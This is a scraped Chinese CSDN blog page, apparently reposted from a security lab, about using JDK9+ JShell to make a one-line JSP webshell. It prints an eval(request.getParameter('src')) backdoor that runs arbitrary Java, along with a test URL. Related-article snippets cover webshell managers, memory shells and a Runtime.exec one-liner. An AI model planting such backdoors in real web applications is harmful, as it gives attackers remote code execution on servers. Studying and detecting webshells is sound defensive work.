java jsp 木马_JShell(JDK9+)eval任意Java代码片段执行

最新推荐文章于 2023-12-18 16:26:02 发布
最新推荐文章于 2023-12-18 16:26:02 发布
阅读量300 收藏
点赞数
文章标签: java jsp 木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39737240/article/details/112355316
版权
本文介绍了JDK9引入的JShell功能,该功能允许开发者在命令行中方便地编写和执行Java代码。尽管在生产环境中JDK9的采用率不高,但作者指出利用此特性可以实现Java一句话木马,通过`jsp`页面传递`src`参数执行任意Java代码。给出了一个简单的测试用例,展示了如何执行`pwd`命令。凌天实验室,专注于应用安全研究,其成员拥有丰富的攻防技术和实战经验。
摘要由CSDN通过智能技术生成

点击上方“凌天实验室”,“星标或置顶公众号”

漏洞、技术还是其他,我都想第一时间和你分享

987bd3cce70d376815c370802731a399.png

写在之前:

最近几年开发RASP产品期间整理了很多的Java语言的特性~

JDK9开始提供一个叫jshell的功能,让开发者可以想python和php一样在命令行下愉快的写测试代码了。JDK9已经发布距今2年多了,但在生产环境下使用JDK8以上的应用依旧寥寥无几。不过我们只需要利用这一特性其实是可以实现任意代码执行了,也就是说正真意义上的原生的java一句话木马实现了。

测试代码:

eval(request.getParameter("src"))%>

就这么简单的一行代码就可以了,src参数值是java代码片段。

870cd365bd6fb3c6493f5e9189b3ba3c.png

测试用例:

http://localhost:8080/mod

最低0.47元/天 解锁文章
weixin_39737240
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JSP WebSehll 后门脚本
悦分享
08-01 1317
目前很多大型厂商都选择使用Java进行Web项目的开发,近年来随着各种JAVA指定环境RCE漏洞的出现,JavaWeb的安全逐渐被人们所重视,与漏洞相关的还有用于后期维持权限的Webshell。与PHP不同的是,JSP的语言特性较为严格,属于强类型语言,并且在JDK9以前并没有所谓的eval函数。一般而言JSP的变形免杀较为困难,但是依旧存在很多的”黑魔法”。不知攻,焉知防。阿里云安骑士Webshell检测系统在迭代升级过程中,除了内部的不断绕过尝试以外,也长期邀请大量白帽子进行持续的绕过测试。...
哥斯拉Godzilla Shell管理工具使用,马分析,特征分析(4K屏不好用,Webshell
墨痕诉清风的博客
04-18 7611
目录 马分析 正文 总结一下木马的利用逻辑: 总结木马特征: 简单使用方法 一些特性 流量加密 插件模块 数据库管理 内存shell 屏幕截图 虚拟终端 JMeterpreter​ ServletManage​ JarLoader​ JZip​ ByPassOpenBasedir​ BypassDisableFunctions​ 笔记 ShellCodeLoader SafetyKatz lemon BadPotato​ SharpWeb​ Sweet...
内存中动态编译执行java代码
10-25
不需要任何java类文件,将字符串输入到内存,然后编译,加载,执行,整个过程全部在内存中实现,不会产生.java和.class文件,做到了洁净无污染。
java中动态执行一段代码
热门推荐
kingfish的专栏
04-03 1万+
动态的执行一段简单代码,采用生成java文件,调用javac编译,反射执行的方式。只是一个简单测试,有些地方有待完善。代码如下import java.io.*;/** * 动态执行一段代码(生成文件->编译->执行) * @author kingfish * @version 1.0 */public class TestRun {  private String fileName = "Test
java动态执行代码
weixin_42343195的博客
11-08 472
java动态执行代码
关于 JDK 9 中的 JShell,你应该了解的 10 件事
weixin_33935777的博客
04-06 314
2019独角兽企业重金招聘Python工程师标准>>> ...
Java动态编译并执行JavaCompiler动态编译并执行java代码片段
yondd的博客
09-27 1451
JavaCompiler动态编译并执行java代码片段
Java安全-Java Web后门学习 Jsp 一句话分析
drhrht的博客
05-14 4548
文章目录 Java Web后门 一句话木马 反射调用 类加载(冰蝎马实现方式) ELSE 参考 Java Web后门 Java 是强类型语言,不能够像 PHP 那样利用字符串组合当作系统函数使用 Java 中常用的命令执行函数 java.lang.Runtime.exec() java.lang.ProcessBuilder.start() 一句话木马 最简单的 jsp 一句话木马 <% Runtime.getRuntime().exec(request.getParameter(".
内存马介绍及分析-带查杀工具tomcat memshell scanner.jsp
weixin_65629944的博客
12-18 989
先判断是通过什么方法注入的内存马,可以先查看web日志是否有可疑的web访问日志,如果是filter或者listener类型就会有大量url请求路径相同参数不同的,或者页面不存在但是返回200的,查看是否有类似哥斯拉、冰蝎相同的url请求,哥斯拉和冰蝎的内存马注入流量特征与普通webshell的流量特征基本吻合。4.java VisualVM工具:是一款免费的,集成了多个 JDK 命令行工具的可视化工具,它能为您提供强大的分析能力,对 Java 应用程序做性能分析和调优。cmd=后跟命令即可。
冰蝎逆向初探
悦分享
08-04 1085
其实理解冰蝎整个编写思路并不难,里面的功能(获取服务器基本信息,执行系统命令,文件管理,数据库管理,反弹meterpreter,执行自定义代码等)大致的过程都比较类似。
Java动态编译Java代码,运行在内存中,并执行
01-30
*1.创建 URLClassLoader 类加载器 * 2.获取当前执行的classpath的所有jar包的路径 * 3.通过java的ToolProvider创建JavaCompile,用来执行class源文件 * 4.创建DiagnosticCollector用来执行获取执行失败的错误结果 * 5.添加动态执行的编译环境 options 是个集合,添加内容,字符集,classpath等 * 6.传入JavaFileObject的java文件,是个集合,创建JavaSourceObject实现这个接口,Kind.SOURCE.extension = '.java' * 7.创建任务并执行 * 8.获取执行完成后的返回JavaClassObject类 * 9.创建DynamicClassLoader来加载类 ,defineClass这个方法
java实现eval函数
09-06
java实现eval函数,java文件放入eclipse直接可以运行。
JAVA动态编译执行代码片段部署后报ClassNotFoundException找不到类
yondd的博客
09-27 698
在本地运行,动态编译执行是没有问题的,可是部署到服务器上后报ClassNotFoundException找不到类,有可能是因为本地环境和服务器环境的classpath不一样。例如:nohup /opt/jdk8/bin/java -Dloader.path="lib/" -jar xxx.jar。这样打包之后会在target目录里新生成一个lib文件夹,这个文件夹里就全是依赖包。修改启动命令:添加-Dloader.path="lib/"解决办法:打包的时候依赖包不打进jar包里,单独输出。
java eval_Java实现类似eval()函数或exec()函数的功能
weixin_33479485的博客
02-12 687
一篇参考博客:http://www.cnblogs.com/fangwenyu/archive/2011/10/12/2209051.html在Python中有一个exec()函数,同样在JavaScript中有一个eval()函数,这两个函数有一个相似的特点,那就是可以在里面传入一段Python代码或者JavaScript代码,发现竟然可以运行该代码。但是遗憾的是,Java中并不存在这样的函数,...
java 动态编译运行
这里的分享,都是干货
11-24 2954
Java Compiler 可以动态执行一段字符串形式的java代码,或手动编译java文件。
java一句话木马_如何使用JSP一句话木马和菜刀木马
weixin_39782545的博客
02-16 4312
展开全部相信用过一句话木马的黑阔们对中国32313133353236313431303231363533e4b893e5b19e31333337393033菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使...
【漏洞分析】jdk9+Spring 及其衍生框架
m0_70565884的博客
05-23 315
一. 漏洞利用条件 jdk9+ Spring 及其衍生框架 使用 tomcat 部署 spring 项目 使用了 POJO 参数绑定 Spring Framework 5.3.X < 5.3.18 、2.X < 5.2.20 或者其他版本 二. 漏洞分析 通过 API Introspector. getBeanInfo 可以获取到 POJO 的基类 Object.class 的属性 class,进一步可以获取到 Class.class 的其他属性,其中就包括了 classloa
当年偶然发现的 Java Bug(JDK 9及之前仍未修复)
叨叨软件测试
09-05 607
背景 15年在中信银行做持续集成时,由于当时的项目是基于三方采购的 Java 配置开发平台做的,平台自己基于 Ant插件实现了增量和热部署。 其中有几个项目在持续集成部署时,经常发现 Linux平台部署成功后(Windows不会出现,Linux也是偶发现象),新版本代码并没有生效(反编译 class)。 起初我是在本地 windows上跟踪调试基于 Ant插件的代码,但始终重现不了(最后测试发现 Windows 无此 Bug)。 后来,通过分析代码逻辑,其中有段逻辑是通过文件的最后修改时间(File.las
JShell使用
weixin_38568503的博客
12-23 412
Java 9 REPL (JShell) REPL(Read Eval Print Loop)意为交互式的编程环境。 简介: JShellJava 9 新增的一个交互式的编程环境工具。它允许你无需使用类或者方法包装来执行 Java 语句。它与 Python 的解释器类似,可以直接 输入表达式并查看其执行结果。 JShell使用 启动和退出: 打开dos窗口: 启动:jshell回车 退出:/exit回车 要以详细模式启动JShell,请使用以下-v选项:jshell -v 可以按照如下图片进
the+java_home+environment+nb:java_home+should+point+to+a+jdk+not+a+jre
最新发布
03-07
the `JAVA_HOME` environment variable is used to specify the location of the Java Development Kit (JDK) on your system. It should point to the root directory of the JDK installation, not the Java ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值